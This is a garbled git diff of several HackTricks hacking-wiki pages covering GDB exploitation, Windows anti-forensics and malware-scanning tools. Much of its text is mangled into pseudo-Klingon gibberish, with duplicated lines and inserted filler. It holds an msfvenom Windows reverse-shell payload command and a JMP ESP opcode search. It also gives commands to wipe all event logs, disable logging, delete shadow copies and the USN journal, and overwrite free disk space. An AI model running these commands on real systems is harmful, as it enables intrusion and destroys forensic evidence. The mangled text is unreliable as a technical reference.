msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
``` ```
# GDB # GDB
## Install ## qay'be'
``` ```
apt-get install gdb apt-get install gdb
``` ```
## Parameters ## Parameters
**-q** --> No show banner\ **-q** --> Qap banner jImej\
**-x \<file>** --> Auto-execute GDB instructions from here\ **-x \<file>** --> GDB instructions jatlh\
**-p \<pid>** --> Attach to process **-p \<pid>** --> process jIloS
### Instructions ### Instructions
\> **disassemble main** --> Disassemble the function\ \> **disassemble main** --> function jatlh\
\> **disassemble 0x12345678**\ \> **disassemble 0x12345678**\
\> **set disassembly-flavor intel**\ \> **set disassembly-flavor intel**\
\> **set follow-fork-mode child/parent** --> Follow created process\ \> **set follow-fork-mode child/parent** --> process jImej\
\> **p system** --> Find the address of the system function\ \> **p system** --> system function jIqIm\
\> **help**\ \> **help**\
\> **quit** \> **quit**
\> **br func** --> Add breakpoint to function\ \> **br func** --> function qutlh\
\> **br \*func+23**\ \> **br \*func+23**\
\> **br \*0x12345678**\ \> **br \*0x12345678**\
**> del NUM** --> Delete that number of br\ **> del NUM** --> NUM qutlh\
\> **watch EXPRESSION** --> Break if the value changes \> **watch EXPRESSION** --> value qImHa'
**> run** --> Execute\ **> run** --> jImej\
**> start** --> Start and break in main\ **> start** --> jImej je main\
\> **n/next** --> Execute next instruction (no inside)\ \> **n/next** --> next instruction jImej (ghorgh)\
\> **s/step** --> Execute next instruction\ \> **s/step** --> next instruction jImej\
\> **c/continue** --> Continue until next breakpoint \> **c/continue** --> next breakpoint jImej
\> **set $eip = 0x12345678** --> Change value of $eip\ \> **set $eip = 0x12345678** --> $eip qImHa'\
\> **info functions** --> Info abount functions\ \> **info functions** --> function jImej\
\> **info functions func** --> Info of the funtion\ \> **info functions func** --> function jImej\
\> **info registers** --> Value of the registers\ \> **info registers** --> registers qImHa'\
\> **bt** --> Stack\ \> **bt** --> Stack\
\> **bt full** --> Detailed stack \> **bt full** --> Detailed Stack
\> **print variable**\ \> **print variable**\
\> **print 0x87654321 - 0x12345678** --> Caculate\ \> **print 0x87654321 - 0x12345678** --> Caculate\
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii \> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> content jImej octal/hexa/10/bin/instruction/ascii
* **x/o 0xDir\_hex** * **x/o 0xDir\_hex**
* **x/2x $eip** --> 2Words from EIP * **x/2x $eip** --> 2Words from EIP
@ -89,7 +119,6 @@ apt-get install gdb
* **x/i $eip** —> Instructions of the EIP * **x/i $eip** —> Instructions of the EIP
## [GEF](https://github.com/hugsy/gef) ## [GEF](https://github.com/hugsy/gef)
```bash ```bash
checksec #Check protections checksec #Check protections
p system #Find system function address p system #Find system function address
@ -109,34 +138,32 @@ pattern search $rsp #Search the offset given the content of $rsp
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f 2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0: Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176 rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8 called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args: Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers: Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176 gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176' [+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely [+] Found at offset 184 (little-endian search) likely
``` ```
## pIq
## Tricks ### GDB cha' addresses
### GDB same addresses GDB debugging DaH jatlh **binary executed when addresses vItlhutlh.** GDB addresses cha' vItlhutlh vaj:
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
* `unset env LINES` * `unset env LINES`
* `unset env COLUMNS` * `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_ * `set env _=<path>` _binary absolute path Put_
* Exploit the binary using the same absolute route * binary cha' absolute route vIghoS
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary * `PWD` 'ej `OLDPWD` GDB 'ej binary cha' vIghoS
### Backtrace to find functions called ### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ DaH **statically linked binary** DaH jatlh functions binary (external libraries). vaj, **identify the flow binary follows to for example ask for user input** vItlhutlh.\
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: binary **running** ghaH **gdb** until input vItlhutlh. vaj, **CTRL+C** 'ej **`bt`** (**backtrace**) command vIghoS functions called:
``` ```
gef➤ bt gef➤ bt
#0 0x00000000004498ae in ?? () #0 0x00000000004498ae in ?? ()
@ -145,7 +172,6 @@ gef➤ bt
#3 0x00000000004011a9 in ?? () #3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? () #4 0x0000000000400a5a in ?? ()
``` ```
## GDB server ## GDB server
`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) `gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
@ -201,23 +227,21 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**rabin2 -i ejecutable -->** Address of all the functions **rabin2 -i ejecutable -->** Address of all the functions
# **Inmunity debugger** # **Inmunity debugger**
```bash ```bash
!mona modules #Get protections, look for all false except last one (Dll of SO) !mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
``` ```
# IDA # IDA
## Debugging in remote linux ## Debugging in remote linux
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary: **tlhIngan Hol:**
IDA qachDaq, linuxDaq binary debugging laH binaries vItlhutlh. vaj binary _linux\_server_ yIlo' _linux\_server64_ linux server vItlhutlh 'ej run vItlhutlh binary DaH jImejDaq:
``` ```
./linux_server64 -Ppass ./linux_server64 -Ppass
``` ```
Qong, configure the debugger: Debugger (linux remote) --> Proccess options...:
Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
![](<../../.gitbook/assets/image (101).png>) ![](<../../.gitbook/assets/image (101).png>)
@ -235,5 +259,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because it is too large Load diff

File diff suppressed because one or more lines are too long

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
@ -91,7 +91,7 @@ Keep in mind the possible use of anti-forensic techniques:
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -119,49 +117,48 @@ Whenever a folder is opened from an NTFS volume on a Windows NT server, the syst
2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. 2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
3. Look for `NtfsDisableLastAccessUpdate`. If it doesnt exist, add this DWORD and set its value to 1, which will disable the process. 3. Look for `NtfsDisableLastAccessUpdate`. If it doesnt exist, add this DWORD and set its value to 1, which will disable the process.
4. Close the Registry Editor, and reboot the server. 4. Close the Registry Editor, and reboot the server.
## Delete USB History ## Delete USB History
All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\ **USB Device Entries** are stored in the Windows Registry under the **USBSTOR** registry key. This key contains subkeys that are created when a USB Device is plugged into a PC or Laptop. The key can be found at H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. Deleting this key will delete the USB history.\
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them). You can also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to ensure that the entries are deleted (and to delete them).
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. Another file that saves information about USBs is the file `setupapi.dev.log` located in `C:\Windows\INF`. This file should also be deleted.
## Disable Shadow Copies ## Disable Shadow Copies
**List** shadow copies with `vssadmin list shadowstorage`\ To **list** shadow copies, use `vssadmin list shadowstorage`.\
**Delete** them running `vssadmin delete shadow` To **delete** them, run `vssadmin delete shadow`.
You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) You can also delete them using the GUI by following the steps provided in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html).
To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): To disable shadow copies, follow the steps outlined in [this link](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
1. Open the Services program by typing "services" into the text search box after clicking the Windows start button. 1. Open the Services program by typing "services" into the text search box after clicking the Windows start button.
2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking. 2. Find "Volume Shadow Copy" from the list, select it, and access Properties by right-clicking.
3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK. 3. Choose "Disabled" from the "Startup type" drop-down menu, and confirm the change by clicking Apply and OK.
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` It is also possible to modify the configuration of which files are copied in the shadow copy by editing the registry key `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`.
## Overwrite deleted files ## Overwrite deleted files
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. * You can use a **Windows tool**: `cipher /w:C`. This command instructs cipher to remove any data from the available unused disk space on the C drive.
* You can also use tools like [**Eraser**](https://eraser.heidi.ie) * You can also use tools like [**Eraser**](https://eraser.heidi.ie).
## Delete Windows event logs ## Delete Windows event logs
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" * Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right-click each category and select "Clear Log".
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`.
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`.
## Disable Windows event logs ## Disable Windows event logs
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`.
* Inside the services section disable the service "Windows Event Log" * Disable the "Windows Event Log" service in the services section.
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` * `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`.
## Disable $UsnJrnl ## Disable $UsnJrnl
* `fsutil usn deletejournal /d c:` * `fsutil usn deletejournal /d c:`.
<details> <details>
@ -177,5 +174,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -52,5 +50,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -31,59 +31,86 @@ Other ways to support HackTricks:
### Yara ### Yara
#### Install #### Install
```bash ```bash
sudo apt-get install -y yara sudo apt-get install -y yara
``` ```
#### Prepare rules #### Prepare rules
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
#### Prepare rules
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
```bash ```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules mkdir rules
python malware_yara_rules.py python malware_yara_rules.py
``` ```
#### Qap
#### Scan ##### Noun
###### Definition:
A process of searching for malware or suspicious files on a system or network.
##### Verb
###### Definition:
To search for malware or suspicious files on a system or network.
##### Example:
- **Noun**: The scan revealed several malicious files on the compromised system.
- **Verb**: The security analyst scanned the network for any signs of intrusion.
```bash ```bash
yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder yara -w malware_rules.yar folder #Scan the whole folder
``` ```
#### YaraGen: malware vItlhutlh je Create rules
#### YaraGen: Check for malware and Create rules [**YaraGen**](https://github.com/Neo23x0/yarGen) tool vItlhutlh yara rules binary. tutorial vItlhutlh: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash ```bash
python3 yarGen.py --update python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/ python3.exe yarGen.py --excludegood -m ../../mals/
``` ```
### ClamAV ### ClamAV
#### Install #### Qay'be'lu'
```
$ sudo apt-get install clamav
```
#### Qay'be'lu'
``` ```
sudo apt-get install -y clamav sudo apt-get install -y clamav
``` ```
#### Qap
#### Scan `Scan` is the process of examining a system or file for the presence of malware. It involves analyzing the system or file to identify any suspicious or malicious behavior or artifacts. The purpose of scanning is to detect and identify malware so that appropriate actions can be taken to mitigate the threat.
There are various scanning techniques and tools available for malware analysis. These include:
- **Signature-based scanning**: This technique involves comparing the system or file against a database of known malware signatures. If a match is found, it indicates the presence of malware.
- **Heuristic scanning**: This technique involves using algorithms to identify potentially malicious behavior or patterns in the system or file. It can detect unknown or zero-day malware that may not have a known signature.
- **Behavioral scanning**: This technique involves monitoring the behavior of the system or file in a controlled environment to identify any suspicious or malicious activity. It can detect malware that may not exhibit any specific signature or behavior.
- **Static analysis**: This technique involves examining the code or structure of the file without executing it. It can identify potential vulnerabilities or malicious code snippets.
- **Dynamic analysis**: This technique involves executing the file in a controlled environment and monitoring its behavior. It can identify any malicious activity or behavior exhibited by the file.
Scanning is an essential step in malware analysis as it helps in identifying and understanding the nature of the malware. It provides valuable insights into the behavior, capabilities, and potential impact of the malware, which can aid in developing effective mitigation strategies.
```bash ```bash
sudo freshclam #Update rules sudo freshclam #Update rules
clamscan filepath #Scan 1 file clamscan filepath #Scan 1 file
clamscan folderpath #Scan the whole folder clamscan folderpath #Scan the whole folder
``` ```
### [Capa](https://github.com/mandiant/capa) ### [Capa](https://github.com/mandiant/capa)
**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as: **Capa** jatlhbe'chugh executables: PE, ELF, .NET, **capabilities** potlh potentially malicious **detects**. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
* check for OutputDebugString error * OutputDebugString error check
* run as a service * run as a service
* create process * create process
@ -101,61 +128,56 @@ You can use tools such as [**Redline**](https://www.fireeye.com/services/freewar
[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ [**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
Detection is based on four detection methods: Detection is based on four detection methods:
``` ```
1. File Name IOC 1. File Name IOC
Regex match on full file path/name Regex match on full file path/name
2. Yara Rule Check 2. Yara Rule Check
Yara signature matches on file data and process memory Yara signature matches on file data and process memory
3. Hash Check 3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
4. C2 Back Connect Check 4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10) Compares process connection endpoints with C2 IOCs (new since version v.10)
``` ```
### Linux Malware Detect ### Linux Malware Detect
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources. [**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) jatlh malware scanner'e' Linux'e' chel, GNU GPLv2 license'e' released'e', vaj shared hosted environments'e' faced threats'e' designed'e'. Qapla' network edge intrusion detection systems'e' threat data vItlhutlh malware actively being used'e' attacks'e' extract'e' vaj detection'e' signatures generate'e'. Furthermore, LMD checkout feature vaj malware community resources'e' user submissions vItlhutlh threat data derived'e'.
### rkhunter ### rkhunter
Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware. [**rkhunter**](http://rkhunter.sourceforge.net) vItlhutlh tools'e' filesystem possible rootkits malware check'e'.
```bash ```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
``` ```
### FLOSS ### FLOSS
[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques. [**FLOSS**](https://github.com/mandiant/flare-floss) jatlh executables vItlhutlh obfuscated strings naj using techniques chel.
### PEpper ### PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). [PEpper ](https://github.com/Th3Hurrican3/PEpper) vItlhutlh executables (binary data, entropy, URLs and IPs, yara rules) chel.
### PEstudio ### PEstudio
[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques. [PEstudio](https://www.winitor.com/download) vItlhutlh Windows executables (imports, exports, headers) chel, virus total chel, potential Att\&ck techniques chel.
### Detect It Easy(DiE) ### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**. [**DiE**](https://github.com/horsicq/Detect-It-Easy/) vItlhutlh file **encrypted** chel, **packers** chel.
### NeoPI ### NeoPI
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. [**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) Python script vItlhutlh **statistical methods** chel, obfuscated chel, encrypted chel content text/script files chel. NeoPI intended purpose chel **detection hidden web shell code** chel.
### **php-malware-finder** ### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. [**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) vItlhutlh **obfuscated**/**dodgy code** chel, files PHP functions chel malwares/webshells chel.
### Apple Binary Signatures ### Apple Binary Signatures
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** malware sample vItlhutlh **check signature** binary chel, developer signed chel **related** malware chel.
```bash ```bash
#Get signer #Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -166,20 +188,19 @@ codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid #Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app spctl --assess --verbose /Applications/Safari.app
``` ```
## Detection Techniques ## Detection Techniques
### File Stacking ### File Stacking
If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file. **QaStaHvIS** **web server** **files** **puS** **folder** **yInISeggHommey** **date** **last updated**. **web server** **files** **created and modified** **date** **check** **'ej** **date** **'e'** **suspicious**, **file** **check**.
### Baselines ### Baselines
If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**. **folder** **files** **modified** **shouldn't have been**, **hash** **'ej** **original files** **calculate** **can** **compare** **'ej** **current** **ones**. **modified** **suspicious** **will be**.
### Statistical Analysis ### Statistical Analysis
When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. **logs** **saved** **information** **when**, **web server** **file** **accessed** **times** **many** **check** **can** **shell web** **one** **might be**.
<details> <details>

View file

@ -1,72 +1,69 @@
# Memory dump analysis # qo'wI' 'oH
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>DaH jImej</strong></a><strong>! HackTricks</strong> 'e' vItlhutlh</summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **cybersecurity company** 'oH? **HackTricks** vItlhutlh **company** advertise **chavmoH**? 'ej **PEASS latest version** **download** 'ej **HackTricks PDF** **access** vItlhutlh? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS**!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, **exclusive NFTs** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **collection**
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** [**follow**] **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. * **Share** hacking tricks **hacktricks repo** 'ej [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) **submit** PRs.
</details> </details>
